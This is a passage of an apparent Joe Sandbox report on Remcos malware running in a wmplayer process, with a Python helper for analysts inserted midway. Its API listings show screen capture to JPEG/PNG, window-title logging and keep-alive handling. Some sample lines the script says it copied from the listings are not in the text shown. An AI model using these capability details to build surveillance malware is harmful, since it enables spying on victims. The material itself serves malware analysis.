                                                                                            • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                            • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                            • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                            • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                            APIs
                                                                                            • EnumDisplayMonitors.USER32(00000000,00000000,004186FC,00000000), ref: 00418622
                                                                                            • EnumDisplayDevicesW.USER32(?), ref: 00418652
                                                                                            • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186C7
                                                                                            • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DisplayEnum$Devices$Monitors
                                                                                            • String ID:
                                                                                            • API String ID: 1432082543-0
                                                                                            • Opcode ID: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
                                                                                            • Instruction ID: c4057a13d51126afc728f52e86ef46095e095b9ab785e002ac05b4ca5e4d76c5
                                                                                            • Opcode Fuzzy Hash: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
                                                                                            • Instruction Fuzzy Hash: 9221B1722043046BD220EF16DC44EABFBECEFD1754F00052FB949D3191EE74AA45C6AA
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: SystemTimes$Sleep__aulldiv
                                                                                            • String ID:
                                                                                            • API String ID: 188215759-0
                                                                                            • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                            • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                            • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                            • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                            APIs
                                                                                              • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                              • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                              • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Window$SleepText$ForegroundLength
                                                                                            • String ID: [ $ ]
                                                                                            • API String ID: 3309952895-93608704
                                                                                            • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                            • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                            • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                            • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                            • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                            • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                            • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                            • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                            • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                            • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                              • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                              • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                            • String ID:
                                                                                            • API String ID: 737400349-0
                                                                                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                            • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                            • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                            • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                            • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                            • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                            • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                            • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                            • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                            • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem
                                                                                            • String ID:
                                                                                            • API String ID: 4116985748-0
                                                                                            • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                            • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                            • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                            • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
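The API listings above are only useful to an analyst once the raw hex arguments are decoded: the registry read behind the `exepath` string opens 80000001 (HKEY_CURRENT_USER) with access mask 00020019 (KEY_READ) and queries into a 0x208-byte buffer, the Sleep(00000BB8) is a 3000 ms delay, and GetSystemMetrics indices 0x4C-0x4F are SM_XVIRTUALSCREEN, SM_YVIRTUALSCREEN, SM_CXVIRTUALSCREEN and SM_CYVIRTUALSCREEN, i.e. the geometry needed to capture the whole virtual desktop. The following script is an added example, not part of the Joe Sandbox report or of Remcos: it parses API lines in the format shown on this page and annotates the Win32 constants that appear in them. The sample input is copied from the listings above; the constant tables contain only standard Win32 values, and a `?` argument is treated as unresolved because that is how the report renders arguments it could not read from the stack at call time (an interpretation, not something the report states).

```python
import re
from typing import Dict, List, Optional

# Constructed sample: API lines copied verbatim from the function listings on this page.
SAMPLE_LINES = [
    "• Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679",
    "• Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692",
    "• Sleep.KERNEL32(00000BB8), ref: 004115C3",
    "• GetSystemMetrics.USER32(0000004C), ref: 00418519",
    "• GetSystemMetrics.USER32(0000004F), ref: 0041852B",
    "• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242",
]

# One listing line: optional "Part of subcall function XXXXXXXX:", then API.MODULE(args), ref: ADDR.
# Lines for CRT internals (e.g. "___BuildCatchObject.LIBVCRUNTIME ref: 0043810F") carry no argument list.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_@:]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Standard Win32 values (documented in winreg.h / winuser.h / libloaderapi.h).
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
SM_INDEX = {
    0x4C: "SM_XVIRTUALSCREEN", 0x4D: "SM_YVIRTUALSCREEN",
    0x4E: "SM_CXVIRTUALSCREEN", 0x4F: "SM_CYVIRTUALSCREEN",
}
KEY_READ = 0x20019
LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x800


def parse_api_line(line: str) -> Optional[Dict]:
    """Split one listing line into api, module, raw args, call site and enclosing subcall."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    raw = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": [] if not raw else raw.split(","),
        "ref": m.group("ref"),
        "subcall_of": m.group("sub"),  # None when the call is in the listed function itself
    }


def _hex(arg: str) -> Optional[int]:
    """Only 8-digit hex tokens are numeric; '?' and symbol names (e.g. FlsSetValue) are not."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{8}", arg) else None


def annotate(call: Dict) -> List[str]:
    """Decode the arguments an analyst cares about for the APIs seen in this report."""
    api, args = call["api"], call["args"]
    vals = [_hex(a) for a in args]
    notes: List[str] = []
    if api == "RegOpenKeyExA" and len(vals) >= 4:
        if vals[0] in HKEY_ROOTS:
            notes.append(f"hKey={HKEY_ROOTS[vals[0]]}")
        if vals[3] == KEY_READ:
            notes.append("samDesired=KEY_READ")
    elif api == "RegQueryValueExA" and len(vals) >= 5 and vals[4] is not None:
        notes.append(f"buffer={vals[4]} bytes")          # lpcbData as passed in
    elif api == "Sleep" and vals and vals[0] is not None:
        notes.append(f"{vals[0]} ms")
    elif api == "GetSystemMetrics" and vals and vals[0] in SM_INDEX:
        notes.append(SM_INDEX[vals[0]])
    elif api == "LoadLibraryExW" and len(vals) >= 3 and vals[2] is not None:
        if vals[2] & LOAD_LIBRARY_SEARCH_SYSTEM32:
            notes.append("LOAD_LIBRARY_SEARCH_SYSTEM32")   # dwFlags is the third parameter
    if "?" in args:
        notes.append("some args unresolved ('?')")
    return notes


def summarize(lines: List[str]) -> List[str]:
    """One human-readable line per parsable API call."""
    out = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        where = call["ref"] + (f" (via {call['subcall_of']})" if call["subcall_of"] else "")
        out.append(f"{call['api']} @ {where}: " + ("; ".join(annotate(call)) or "no annotation"))
    return out


if __name__ == "__main__":
    for entry in summarize(SAMPLE_LINES):
        print(entry)
```

The annotation tables are deliberately small and limited to the calls that occur on this page; extending them is a matter of adding entries. Treat decoded values as hints rather than ground truth: the report captures argument slots from the stack at the moment of the call, so a stale or unresolved slot (shown as `?`, or a value that makes no sense for the parameter position) should be confirmed in the disassembly before it goes into a detection rule.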
                                                                                            APIs
                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorHandling__start
                                                                                            • String ID: pow
                                                                                            • API String ID: 3213639722-2276729525
                                                                                            • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                            • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                            • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                            • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 1000655C
                                                                                              • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                                              • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                              • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                            • String ID: *?$.
                                                                                            • API String ID: 2667617558-3972193922
                                                                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                            • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                            • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Info
                                                                                            • String ID: $fD
                                                                                            • API String ID: 1807457897-3092946448
                                                                                            • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                            • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                            • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                            • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                            APIs
                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                                                              • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                            • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                                                              • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                              • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                            • String ID: image/jpeg
                                                                                            • API String ID: 1291196975-3785015651
                                                                                            • Opcode ID: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
                                                                                            • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                                                            • Opcode Fuzzy Hash: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
                                                                                            • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                            APIs
                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ACP$OCP
                                                                                            • API String ID: 0-711371036
                                                                                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                            • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                            • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                            APIs
                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                                                              • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                                                              • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                              • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                            • String ID: image/png
                                                                                            • API String ID: 1291196975-2966254431
                                                                                            • Opcode ID: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                            • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                                                            • Opcode Fuzzy Hash: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                            • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                            Strings
                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocalTime
                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                            • API String ID: 481472006-1507639952
                                                                                            • Opcode ID: ef17581a39fbd391229547539f15d99c33dd27b8bec5d6813d4c4f21374c3312
                                                                                            • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                            • Opcode Fuzzy Hash: ef17581a39fbd391229547539f15d99c33dd27b8bec5d6813d4c4f21374c3312
                                                                                            • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
